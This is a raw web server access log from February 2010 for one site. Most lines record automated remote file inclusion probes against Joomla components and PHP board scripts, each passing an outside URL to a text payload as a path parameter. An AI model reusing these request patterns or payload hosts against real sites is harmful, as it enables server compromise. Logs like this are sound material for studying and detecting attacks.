213.179.255.82 - - [19/Feb/2010:10:58:22 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:58:22 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:10:58:22 -0800] "GET /logs/access_100123.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:10:59:51 -0800] "GET /logs/help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:10:59:51 -0800] "GET /help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:10:59:51 -0800] "GET /logs/access_100204.log/help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:11:00:04 -0800] "GET /logs/access_100121.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:11:00:05 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:11:00:52 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:11:00:53 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:11:00:53 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
65.18.192.91 - - [19/Feb/2010:11:00:54 -0800] "GET /appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.18.192.91 - - [19/Feb/2010:11:00:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.18.192.91 - - [19/Feb/2010:11:00:54 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.18.192.91 - - [19/Feb/2010:11:00:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.18.192.91 - - [19/Feb/2010:11:00:54 -0800] "GET /appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.18.192.91 - - [19/Feb/2010:11:00:54 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:00:56 -0800] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:00:57 -0800] "GET /logs////administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:00:57 -0800] "GET /logs/access_100203.log%20%20////administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:01:07 -0800] "GET /logs/access_100208.log%20%20////administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:01:36 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:11:01:40 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:11:01:40 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:11:01:40 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [19/Feb/2010:11:05:27 -0800] "GET /logs/access_100207.log%20%20//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:11:05:38 -0800] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:11:05:38 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:11:05:38 -0800] "GET /logs/access_100119.log%20%20/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:11:05:45 -0800] "GET /logs/access_100124.log%20%20/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:05:53 -0800] "GET ///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:05:53 -0800] "GET /logs////administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:05:53 -0800] "GET /logs/access_100203.log////administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:11:05:54 -0800] "GET /logs/access_100208.log////administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:06:12 -0800] "GET /logs/access_100207.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:06:12 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:06:12 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [19/Feb/2010:11:06:28 -0800] "GET /logs/access_100209.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:06:40 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:06:40 -0800] "GET /logs/access_100207.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:06:40 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:11:06:54 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:11:06:54 -0800] "GET /ideal/forum/viewtopic.php?p=29025 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:11:08:30 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:11:08:30 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:11:08:30 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:11:08:45 -0800] "GET /logs/access_100119.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:11:08:50 -0800] "GET /logs/access_100124.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:08:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:08:59 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:08:59 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:09:35 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:09:35 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:09:35 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [19/Feb/2010:11:10:03 -0800] "GET /logs/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [19/Feb/2010:11:10:03 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [19/Feb/2010:11:10:03 -0800] "GET /become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:10:09 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:11:10:22 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:10:52 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:11:11:15 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:12:12 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:12:14 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:12:14 -0800] "GET /logs/access_100204.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:11:12:18 -0800] "GET /logs/access_100121.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [19/Feb/2010:11:12:27 -0800] "GET /logs/access_100205.log//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:11:12:30 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:11:12:30 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:11:12:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:11:12:30 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [19/Feb/2010:11:12:35 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:11:12:58 -0800] "GET /logs/access_100121.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [19/Feb/2010:11:13:08 -0800] "GET /logs/access_100207.log//write.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:11:13:13 -0800] "GET /logs/access_100113.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:15 -0800] "GET /logs/access_100127.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:29 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:30 -0800] "GET /logs/access_100204.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:34 -0800] "GET /logs/access_100204.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:13:34 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.108.150.235 - - [19/Feb/2010:11:14:36 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.puaga.com"
95.108.150.235 - - [19/Feb/2010:11:14:37 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; H)" "puaga.com"
95.108.150.235 - - [19/Feb/2010:11:14:38 -0800] "GET / HTTP/1.1" 200 3642 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.puaga.com"
95.108.150.235 - - [19/Feb/2010:11:14:39 -0800] "GET / HTTP/1.1" 200 3642 "-" "Yandex/1.01.001 (compatible; Win16; H)" "puaga.com"
95.108.150.235 - - [19/Feb/2010:11:14:40 -0800] "GET / HTTP/1.1" 200 3642 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.puaga.com"
95.108.150.235 - - [19/Feb/2010:11:14:41 -0800] "GET / HTTP/1.1" 200 3642 "-" "Yandex/1.01.001 (compatible; Win16; H)" "puaga.com"
88.191.43.7 - - [19/Feb/2010:11:14:44 -0800] "GET /logs/access_100127.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:15:11 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:11:16:14 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:11:16:15 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:16:35 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [19/Feb/2010:11:17:50 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [19/Feb/2010:11:17:50 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.166.72.254 - - [19/Feb/2010:11:18:15 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.166.72.254 - - [19/Feb/2010:11:18:15 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.166.72.254 - - [19/Feb/2010:11:18:15 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [19/Feb/2010:11:19:21 -0800] "GET /logs/access_100122.log%20//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:20:23 -0800] "GET /logs/access_100203.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:20:23 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:20:24 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.166.72.254 - - [19/Feb/2010:11:20:34 -0800] "GET /logs/access_100120.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.166.72.254 - - [19/Feb/2010:11:20:37 -0800] "GET /logs/access_100120.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [19/Feb/2010:11:20:48 -0800] "GET /logs/access_100117.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:21:19 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:21:21 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:11:21:21 -0800] "GET /logs/access_100203.log////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:11:21:57 -0800] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com" 80.97.64.32 - -